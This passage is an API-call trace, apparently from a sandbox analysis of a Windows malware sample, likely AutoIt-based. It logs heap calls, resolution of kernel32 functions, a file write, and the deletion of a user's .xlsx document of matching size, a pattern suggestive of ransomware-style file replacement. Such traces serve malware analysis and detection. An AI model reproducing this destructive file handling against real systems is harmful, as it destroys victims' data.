HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.213] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0180.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd828 [0180.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd828, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0180.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.215] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0180.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0180.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.216] WriteFile (in: hFile=0x120, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x1b20, lpOverlapped=0x0) returned 1 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0180.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0180.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0180.219] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0180.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.220] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.220] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.220] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.220] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.220] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0180.221] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0180.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.221] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0180.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.223] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.223] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0180.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.223] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.223] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.224] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpFilePart=0x0) returned 0x3a [0180.225] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0x10b22840, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 0x90af58 [0180.226] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ycwvofdiac7at.xlsx")) returned 1 [0180.233] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0x10b22840, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 0 [0180.233] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0180.234] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.234] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.234] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.234] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.234] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.234] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.234] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.234] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.236] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 